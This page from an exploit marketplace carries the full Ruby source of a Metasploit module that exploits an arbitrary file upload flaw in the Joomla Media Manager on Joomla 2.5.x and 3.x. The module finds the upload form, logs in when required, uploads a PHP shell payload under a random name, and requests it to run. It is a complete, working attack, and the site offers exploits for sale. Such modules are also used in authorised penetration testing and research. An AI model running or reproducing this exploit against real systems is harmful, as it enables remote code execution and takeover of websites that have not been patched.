0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Joomla Media Manager File Upload Vulnerability
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Joomla Media Manager File Upload Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as 3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component, which comes by default in Joomla, allowing arbitrary file uploads, and results in arbitrary code execution. The module has been tested successfully on Joomla 2.5.13 and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media Manager, you will need to supply a valid username and password (Editor role or higher) in order to work properly. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB 'juan vazquez' # Metasploit module ], 'References' => [ [ 'OSVDB', '95933' ], [ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ], [ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ], [ 'URL', 'https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ], [ 'URL', 'http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/' ] ], 'Payload' => { 'DisableNops' => true, # Arbitrary big number. The payload gets sent as POST data, so # really it's unlimited 'Space' => 262144, # 256k }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Joomla 2.5.x <=2.5.13', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 01 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']), OptString.new('USERNAME', [false, 'User to login with', '']), OptString.new('PASSWORD', [false, 'Password to login with', '']), ], self.class) end def peer return "#{rhost}:#{rport}" end def check res = get_upload_form if res and res.code == 200 if res.body =~ /You are not authorised to view this resource/ print_status("#{peer} - Joomla Media Manager Found but authentication required") return Exploit::CheckCode::Detected elsif res.body =~ /<form action="(.*)" id="uploadForm"/ print_status("#{peer} - Joomla Media Manager Found and authentication isn't required") return Exploit::CheckCode::Detected end end return Exploit::CheckCode::Safe end def upload(upload_uri) begin u = URI(upload_uri) rescue ::URI::InvalidURIError fail_with(Exploit::Failure::Unknown, "Unable to get the upload_uri correctly") end data = Rex::MIME::Message.new data.add_part(payload.encoded, "application/x-php", nil, "form-data; name=\"Filedata[]\"; filename=\"#{@upload_name}.\"") post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{u.path}?#{u.query}", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'cookie' => @cookies, 'vars_get' => { 'asset' => 'com_content', 'author' => '', 'format' => '', 'view' => 'images', 'folder' => '' }, 'data' => post_data }) return res end def get_upload_form res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "index.php"), 'cookie' => @cookies, 'encode_params' => false, 'vars_get' => { 'option' => 'com_media', 'view' => 'images', 'tmpl' => 'component', 'e_name' => 'jform_articletext', 'asset' => 'com_content', 'author' => '' } }) return res end def get_login_form res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "index.php", "component", "users", "/"), 'cookie' => @cookies, 'vars_get' => { 'view' => 'login' } }) return res end def login res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "index.php", "component", "users", "/"), 'cookie' => @cookies, 'vars_get' => { 'task' => 'user.login' }, 'vars_post' => { 'username' => @username, 'password' => @password }.merge(@login_options) }) return res end def parse_login_options(html) html.scan(/<input type="hidden" name="(.*)" value="(.*)" \/>/) {|option| @login_options[option[0]] = option[1] if option[1] == "1" # Searching for the Token Parameter, which always has value "1" } end def exploit @login_options = {} @cookies = "" @upload_name = "#{rand_text_alpha(rand(5) + 3)}.php" @username = datastore['USERNAME'] @password = datastore['PASSWORD'] print_status("#{peer} - Checking Access to Media Component...") res = get_upload_form if res and res.code == 200 and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/ print_status("#{peer} - Authentication required... Proceeding...") if @username.empty? or @password.empty? fail_with(Exploit::Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials") end @cookies = res.get_cookies.sub(/;$/, "") print_status("#{peer} - Accessing the Login Form...") res = get_login_form if res.nil? or res.code != 200 or res.body !~ /login/ fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Login Form") end parse_login_options(res.body) res = login if not res or res.code != 303 fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to Authenticate") end elsif res and res.code ==200 and res.headers['Set-Cookie'] and res.body =~ /<form action="(.*)" id="uploadForm"/ print_status("#{peer} - Authentication isn't required.... Proceeding...") @cookies = res.get_cookies.sub(/;$/, "") else fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to Access the Media Manager Component") end print_status("#{peer} - Accessing the Upload Form...") res = get_upload_form if res and res.code == 200 and res.body =~ /<form action="(.*)" id="uploadForm"/ upload_uri = Rex::Text.html_decode($1) else fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Upload Form") end print_status("#{peer} - Uploading shell...") res = upload(upload_uri) if res.nil? or res.code != 200 fail_with(Exploit::Failure::Unknown, "#{peer} - Upload failed") end register_files_for_cleanup("#{@upload_name}.") print_status("#{peer} - Executing shell...") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "images", @upload_name), }) end end # 0day.today [2024-05-20] #